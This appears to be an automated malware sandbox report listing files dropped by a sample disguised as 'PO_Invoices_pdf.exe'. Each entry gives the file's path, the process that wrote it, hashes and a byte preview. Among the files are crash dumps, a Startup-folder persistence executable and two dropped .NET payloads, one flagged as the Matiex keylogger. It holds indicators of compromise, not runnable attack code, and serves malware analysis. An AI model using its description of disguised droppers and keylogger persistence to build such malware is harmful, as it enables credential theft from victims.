                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4678
                                                                                                  Entropy (8bit):4.444767498901979
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsCJgtWI9HnWSC8Bxk8fm8M4JFKqJFx+q8vv9/URyHzd:uITfQoWSNTJJFKsKlcRyHzd
                                                                                                  MD5:5CF35384506171C76D238D23345102E5
                                                                                                  SHA1:2AD1BF4FCD9C1D89B39F4F1FF1D5EA58FDBF6B1A
                                                                                                  SHA-256:A5F959079EDED28B1CFBBAF95E51A355666A142A81565719D9BF2F2F7662BEDD
                                                                                                  SHA-512:D690E05F2D00A5FDF49829F1DC1C43552A91D3A40DA8109B53302058211CB5A3FD1EA4C4D59C1397FD74833972ED29AC99E716E969682AD2E4FE92BE816EF56E
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER81AC.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7646
                                                                                                  Entropy (8bit):3.693579069726026
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNiJ5z6ZcJ6YQK6AgmfZSnS/ZCp1sc1fbkm:RrlsNiHz6M6YV6AgmfInS/Asmfd
                                                                                                  MD5:3A508C183E8DBAAD5D3D8713B56F9361
                                                                                                  SHA1:EDFA7FE427707929A6A6DDD1EB0F3DDF3BEF18F7
                                                                                                  SHA-256:23CA4EDA7A443492D22C975864EBFB9D0465DBAD4417390EF4F7FA36B5ECF537
                                                                                                  SHA-512:5CE0BDCDA608DBD7757226268407E053148AE9B88329656B566BEBC651158048859EBF03A48B1DAC9BE380F53A32BAC3A1812753ED269A80491FFF274BB80107
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8566.tmp.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4678
                                                                                                  Entropy (8bit):4.444768514534563
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsJJgtWI9HnWSC8Bcs8fm8M4JFKqJFY2+q8vvp/URyHDd:uITfboWSNqRJFKIKxcRyHDd
                                                                                                  MD5:5A22E2B7CEDA2DCE82BD29C8364400C6
                                                                                                  SHA1:517E131B4D1A984B5D79E041EE6E823CB85B771C
                                                                                                  SHA-256:FBBC0C2B8668F47624704691F6B1D3637C4FEB80B191B86781C760557D98B973
                                                                                                  SHA-512:2CEEBEA847BAB89C2F152F6A0A007E2793656F68E736A03D28386F374B621B2EDF4A10680194E1F3D5A4031B6DD96CFA5D02D8A330383A9BD6B3CEFB40B063AA
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843963" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF48.tmp.mdmp
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Feb 2 16:52:18 2021, 0x60521 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6824818
                                                                                                  Entropy (8bit):4.735635134294259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:EaauHsiIP9H6hIb1Xa73vlirFYuerqFpCqkJpljZcsZccO:LxHsiIP9H469BXYfZc1
                                                                                                  MD5:CC42182766C160A4269CBC0CB6DD537A
                                                                                                  SHA1:2123EFAF6B085E889046DB5EFAA87A1A3BE29652
                                                                                                  SHA-256:AAC3FBCFE568BD68FC4B213308FF5C593EE3AAB47FC2C9447754239579E838B5
                                                                                                  SHA-512:7561C17ECED613BCF3D4026BBB25000CBC440F46EF912EB8AE6934EDED5793B0564C17EC254AE89D7B04CF7D347DCEA782354648D235A90ED3068F3FDCBD7471
                                                                                                  Malicious:false
                                                                                                  Preview: MDMP....... .......B..`!..................U...........B.......3......GenuineIntelW...........T...........#..`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD020.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6346
                                                                                                  Entropy (8bit):3.726879109228151
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNier6hY0SwZCpr+89bJnvsfNjm:RrlsNiq6hY0SwWJnUf0
                                                                                                  MD5:859C2D09E985859C05BA524E847AE1F7
                                                                                                  SHA1:D77BC6804E32D6EA7001D46678CCA826F5E68F68
                                                                                                  SHA-256:6DB7AAEE60D7D508523C3BA1B51655E0707872B4BE51B8CFBC88A401CF1DA410
                                                                                                  SHA-512:9C1439031B122D8ED9361117E3B095D7E1335C0038463AF84886873B8B543D36081056ADA864C8C42A165B851F590D079473962B5C3B92D05BC0D9C207E8F1D6
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.2.4.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD84E.tmp.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4658
                                                                                                  Entropy (8bit):4.484771487000801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsCJgtWI9HnWSC8BN8fm8M4JUkZFK+q84UN/URyHAd:uITfQoWSNAJJOoNcRyHAd
                                                                                                  MD5:9363D872E68ACC797390D6712DA8521C
                                                                                                  SHA1:A04E6EAEC66ECA386CBE020130B59BD71172009F
                                                                                                  SHA-256:73F1FD36F750B4FD1E3B300530421BC897887B4B3D3BFE85C6893B3C0341F4C4
                                                                                                  SHA-512:43CFE15E426B91B113B4E3B109BA0C4030F623CF356D7D4D66DB849A989390EBFFD9C770824B21BB42D0DC0BE54251039A2678920F8851631652EE0AFF7878E8
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDB6.tmp.mdmp
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Feb 2 16:53:45 2021, 0x60521 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6791614
                                                                                                  Entropy (8bit):4.742421345206189
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:xAMauM2xID9H+h1b1XaoDvliXnlYuernx5AqJplvzcnsccD:xdxM2xID9HUMndYpDzcS
                                                                                                  MD5:722E8E235CF8F1D7BFAE5DC73782C39E
                                                                                                  SHA1:8E0E4C0332FE09017117C69966D39BFF3D93BE0F
                                                                                                  SHA-256:87CCC6BF059F6DF8C5EE9B7872438410BB30C6D104B2E7BF5B9230BCE8850A9B
                                                                                                  SHA-512:E14A7BE8D7C59D1833DE5C15B69CDAF76586A2DF0CBC2B930702B7D4B34B8C8DAB1E408BEB07117B2E1BE777FBA5E69A696E42BA42FA18767A890A16FA7EBC04
                                                                                                  Malicious:false
                                                                                                  Preview: MDMP....... ..........`!..................U...........B......H3......GenuineIntelW...........T.......@...g..`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\I$s#$lT3ssl.exe.log
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1406
                                                                                                  Entropy (8bit):5.34928936000881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr74E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKorE4J:MIHK5HKXE1qHbHK5AHKzv4HKnYHKhQnp
                                                                                                  MD5:E26C2069017DA08B1891F176C3FCBB5B
                                                                                                  SHA1:372337FEB1999D2CF9E2CDF4AF964905B6EE025A
                                                                                                  SHA-256:A00F43B55E3A712364B3F1F3A8C0DE7B291111960CAC301A34544666E812E5F9
                                                                                                  SHA-512:F13A01B88578FC81453B4C8389C91237414CF2D95CCFD76FE2291E973C86EFA23192C916FD832802054BFC0B2EE72F6ABD7B057BADF98750C381F32115259F9C
                                                                                                  Malicious:false
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"Sy
                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_Invoices_pdf.exe.log
                                                                                                  Process:C:\Users\user\Desktop\PO_Invoices_pdf.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1406
                                                                                                  Entropy (8bit):5.34928936000881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr74E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKorE4J:MIHK5HKXE1qHbHK5AHKzv4HKnYHKhQnp
                                                                                                  MD5:E26C2069017DA08B1891F176C3FCBB5B
                                                                                                  SHA1:372337FEB1999D2CF9E2CDF4AF964905B6EE025A
                                                                                                  SHA-256:A00F43B55E3A712364B3F1F3A8C0DE7B291111960CAC301A34544666E812E5F9
                                                                                                  SHA-512:F13A01B88578FC81453B4C8389C91237414CF2D95CCFD76FE2291E973C86EFA23192C916FD832802054BFC0B2EE72F6ABD7B057BADF98750C381F32115259F9C
                                                                                                  Malicious:true
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"Sy
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8701
                                                                                                  Entropy (8bit):4.879861859938857
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:cdcU6Clib4oxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smii:cib4NBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                  MD5:E16560503ABB03E8D3A60D67C80E53CB
                                                                                                  SHA1:228496AC44B81BD035E5DAFA6C7298EAC436DBED
                                                                                                  SHA-256:B025E6D38777D7FFC9483E7EFBA2D0DA9766C99113E3441FE56D40A10B85D9D3
                                                                                                  SHA-512:7C0B791A504C1B666C9350A018A2E59C950CABE10832EEEBF88C47784908E8DBE09490E5F9D0A11A05E1200515BB8321E5730E3710EB79633661ED2006F57835
                                                                                                  Malicious:false
                                                                                                  Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command..
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19636
                                                                                                  Entropy (8bit):5.5609303136217765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Et9+XHq0/usaSD01KRYSBKnTYw5Q9QRbp6cQcpPTDEiqWJI5jw:dBaSDS4KTYwO9q8Rs4zWJl
                                                                                                  MD5:E1EFC42BE4A9B9F0A579636314EE85AD
                                                                                                  SHA1:4AE90D27313085028D6E5643B45AC2D15F2E1882
                                                                                                  SHA-256:ABD22A8C7A2F2330B6A3FDD328D07097B1B4494E60C41D9150FF105F93B1D3B7
                                                                                                  SHA-512:F524E684CF1C7A51441A9873A0FFB35C3C205C5159A5C9989EEE36A63C25E0ABB849E667E5D54072986CFF428766B3AD45F8697CC6805DFC39A11101C6FB6943
                                                                                                  Malicious:false
                                                                                                  Preview: @...e.......................].N.N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Z.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                  C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):455680
                                                                                                  Entropy (8bit):5.4156534240521
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:L09yLLuWoujzz/DCBGNv5lToO7OsWXiOV:L09yLyWoujHDX5QO7OvXik
                                                                                                  MD5:80C61B903400B534858D047DD0919F0E
                                                                                                  SHA1:D0AB5400B74392308140642C75F0897E16A88D60
                                                                                                  SHA-256:25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
                                                                                                  SHA-512:B3216F0E4E95C7F50BCCBA5FDCCA2AD622A42379383BE855546FA1E0BAC41A6BEEA8226F8634AD5E0D8596169E0443494018BBE70B7052F094402AECAA038BCE
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 46%
                                                                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................~.... ... ....@.. .......................`............@.................................$...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............x..........x'...h.....................................................................................................................................................................RNK\ZJO@F.EYC.G.IOYKJ._R_CEESEPPlj}ez|"hzfSn`ssdh~DNwq//M\`tdv`|..;.....4......Ewqus._/.....V>..%9%(:&##b?`LLJN.56(,*:.}.2=4lwY_.............................................................................................................A.{YOLI..qAL.tTDY^..v^NY
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4e14qwxc.os0.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awkr53h0.pdr.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fla1cgxx.qbm.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zllqa32j.uf3.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):532992
                                                                                                  Entropy (8bit):6.507156751280516
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:DufqM5JXbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9E:uJXQtqB5urTIoYWBQk1E+VF9mOx9Ei
                                                                                                  MD5:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                  SHA1:D6E4A3CA253BFC372A9A3180B5887C716ED285C6
                                                                                                  SHA-256:B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
